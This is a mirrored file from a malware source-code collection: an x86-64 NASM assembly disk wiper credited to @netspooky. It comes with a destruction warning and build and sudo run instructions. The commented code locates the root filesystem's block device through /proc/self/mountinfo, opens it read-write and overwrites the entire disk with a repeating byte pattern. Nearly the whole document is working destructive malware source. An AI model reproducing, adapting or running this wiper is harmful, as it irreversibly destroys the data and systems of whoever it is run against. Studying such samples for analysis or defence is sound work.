mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
145 lines
11 KiB
NASM
145 lines
11 KiB
NASM
|
;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
|
||
|
;;; ;;; ;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;; ;;;
|
||
|
;;;;;;;;; ;;;;;;;;; ;;;;;; ;;; ;;; ;;; ; ;;; ;;; ;;;
|
||
|
;;; ;;;;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;;
|
||
|
;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;
|
||
|
;-------------------------------------------------------------------------------
|
||
|
; /!\ WARNING /!\
|
||
|
; This program WILL destroy your disk. Run at your own risk, and only
|
||
|
; on systems you are authorized to destroy.
|
||
|
;
|
||
|
; This program opens /proc/self/mountinfo to enumerate filesystems and disks.
|
||
|
; It finds where the filesystem root (/) is mounted, and writes a pattern to
|
||
|
; the entirety of the disk.
|
||
|
;
|
||
|
; Using /proc/self/mountinfo to find / :
|
||
|
;
|
||
|
; [ EXAMPLE ]
|
||
|
;
|
||
|
; $ grep '/ / ' /proc/self/mountinfo
|
||
|
; 32 1 259:2 / / rw,relatime shared:1 - ext4 /dev/nvme0n1p2 rw,errors=remount-ro
|
||
|
; $ grep '/ / ' /proc/self/mountinfo
|
||
|
; 25 0 8:0 / / rw,relatime shared:1 - ext4 /dev/sda rw,errors=remount-ro
|
||
|
;
|
||
|
; Build:
|
||
|
; $ nasm -f elf64 p3.asm ; ld p3.o -o p3
|
||
|
; Run:
|
||
|
; $ sudo ./p3
|
||
|
;----------------------------------------------------------------- @netspooky --
|
||
|
;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;;
|
||
|
;;; ;;; ;;; ;;; ;;; ;;; ;;;
|
||
|
;;; ;;;;;;;;; ;;;;;;;;; ;;;;;; ;;;;;;
|
||
|
;;; ;;; ;;; ;;;;;; ;;; ;;;
|
||
|
;;; ;;; ;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
|
||
|
;-------------------------------------------------------------------------------
|
||
|
section .text ;
|
||
|
global _start ;
|
||
|
_start: ;
|
||
|
mov rdi, 0x6f666e69 ; Pushing the ;
|
||
|
push rdi ; file name ;
|
||
|
mov rdi, 0x746e756f6d2f666c ; /proc/self/mountinfo ;
|
||
|
push rdi ; onto the stack ;
|
||
|
mov rdi, 0x65732f636f72702f ; ... ;
|
||
|
push rdi ; ... ;
|
||
|
mov rdi, rsp ; const char *pathname ;
|
||
|
xor rsi, rsi ; int flags - O_RDONLY ;
|
||
|
mov rax, rsi ; 0 ;
|
||
|
inc rax ; 1 ;
|
||
|
inc rax ; 2 - open syscall ;
|
||
|
syscall ; ;
|
||
|
reader: ; Reading /proc/self/mountinfo so we can parse it. ;
|
||
|
inc rdx ; 1 ;
|
||
|
shl rdx, 14 ; size_t count - # of bytes to read - 0x400 ;
|
||
|
sub rsp, rdx ; Make space on the stack - 0x400 ;
|
||
|
mov r9, rax ; Save fd in r9 for later ;
|
||
|
mov rdi, rax ; int fd - The file descriptor ;
|
||
|
mov rsi, rsp ; void *buf - The buffer that is the stack ;
|
||
|
xor eax, eax ; 0 - read syscall ;
|
||
|
syscall ; RSI still contains the buffer after syscall ;
|
||
|
mov di, 0x202f ; '/ ' - The byte pattern to look for ;
|
||
|
xor rcx, rcx ; 0 ;
|
||
|
inc rcx ; 1 ;
|
||
|
shl rcx, 14 ; 0x400 - Counter for reading the file chunk ;
|
||
|
comp1: ; Looking for the first slash and space in each entry ;
|
||
|
mov bx, word[rsp] ; Move word to bl ;
|
||
|
cmp di, bx ; Compare to the '/ ' pattern ;
|
||
|
je comp2 ; Disk entry found, onto next comparison ;
|
||
|
dec rcx ; Decrement counter ;
|
||
|
jz xxit ; Jump if zero to the end ;
|
||
|
inc rsp ; Read the next byte in the file ;
|
||
|
jmp comp1 ; Jump back to the top ;
|
||
|
comp2: ; Here we are looking for the next slash and space ;
|
||
|
inc rsp ; Since we already know the two bytes at the ;
|
||
|
inc rsp ; pointer, inc twice to get next two bytes ;
|
||
|
mov bx, word[rsp] ; Move word to bl ;
|
||
|
cmp di, bx ; Make the same comparison to '/ ' ;
|
||
|
je comp3 ; Disk holding / was found ;
|
||
|
dec rcx ; Decrement counter ;
|
||
|
jz xxit ; Jump if zero to the end ;
|
||
|
dec rcx ; Decrement counter ;
|
||
|
jz xxit ; Jump if zero to the end ;
|
||
|
inc rsp ; If we didn't find anything, keep going ;
|
||
|
jmp comp1 ; And back to first comparison ;
|
||
|
comp3: ; At this point, we have located the '/ / ' record, so we can look for ;
|
||
|
; the next slash in the disk name ;
|
||
|
inc rsp ; Increment through the rest of the line ;
|
||
|
mov bl, byte[rsp] ; Get just one byte now ;
|
||
|
cmp dil, bl ; dil contains '/' ;
|
||
|
je prep ; If we found it, we have the disk name ;
|
||
|
jmp comp3 ; If not, keep going ;
|
||
|
prep: ; Preparing for the final comparison ;
|
||
|
xor rcx, rcx ; This will hold the length of the disk name ;
|
||
|
mov dil, 0x20 ; We are now looking for a space. ;
|
||
|
getdisk: ; Here we are grabbing the entire disk name ;
|
||
|
inc rsp ; Increment the index ;
|
||
|
inc rcx ; Increment our length counter ;
|
||
|
mov bl, byte[rsp] ; Grab a byte ;
|
||
|
cmp dil, bl ; Compare to a ' ' char ;
|
||
|
je opendisk ; If it matches, we found it! ;
|
||
|
jmp getdisk ; If not, keep going! ;
|
||
|
opendisk: ; Now we are going to open the disk as a file as we did earlier. ;
|
||
|
xor rsi, rsi ; 0 ;
|
||
|
add rsp, 8 ; Pushing a 0 for the null... ;
|
||
|
push rsi ; ...terminator on the disk name string. ;
|
||
|
sub rsp, rcx ; Now RSP points to the disk name ;
|
||
|
mov rdi, rsp ; const char *pathname - pointer to disk name ;
|
||
|
inc rsi ; 1 ;
|
||
|
inc rsi ; 2 - O_RDWR ;
|
||
|
mov rax, rsi ; 2 - open syscall ;
|
||
|
syscall ;
|
||
|
writer: ; We now have the disk open in RW mode, no append. ;
|
||
|
mov rdi, rax ; int fd - The file descriptor ;
|
||
|
mov rsi, 0x7557575757575775 ; This is the marker payload - uWWWWWWu ;
|
||
|
push rsi ; Push the payload ;
|
||
|
mov rsi, rsp ; const void *buf - Payload pointer ;
|
||
|
xor rax, rax ; 0 ;
|
||
|
inc rax ; 1 - write syscall ;
|
||
|
mov rdx, rax ; Get that 1 ;
|
||
|
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
|
||
|
syscall ;
|
||
|
lseeker: ; We have to set up the lseek call so that we will continue writing ;
|
||
|
; to the next byte in the file upon each additional write. ;
|
||
|
xor rdx, rdx ; 0 ;
|
||
|
inc rdx ; int whence; 1 = SEEK_SET ;
|
||
|
mov rsi, rdx ; 1 ;
|
||
|
shl rsi, 3 ; off_t offset; 8 - # of bytes to seek ;
|
||
|
mov rax, rsi ; 8 - lseek syscall ;
|
||
|
syscall ; Note that RDI still contains fd ;
|
||
|
writer2: ; The final write loop, likely segfaults ;
|
||
|
mov rsi, 0xABACABACABACABAC ; This is the pattern payload ;
|
||
|
push rsi ; Push the payload ;
|
||
|
mov rsi, rsp ; const void *buf - Payload pointer ;
|
||
|
xor rax, rax ; 0 ;
|
||
|
inc rax ; 1 - write syscall ;
|
||
|
mov rdx, rax ; Get that 1 ;
|
||
|
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
|
||
|
syscall ;
|
||
|
jmp writer2 ; Bring it around town ;
|
||
|
xxit: ; This is really only here in case of failure ;
|
||
|
mov al, 0x3c ; exit syscall ;
|
||
|
xor rdi, rdi ; 0 - Return code ;
|
||
|
syscall ;------------------------------------------------------------------;
|
||
|
; Dedicated to those fighting for police accountability worldwide. ;
|
||
|
;------------------------------------------------------------------;
|
||
|
|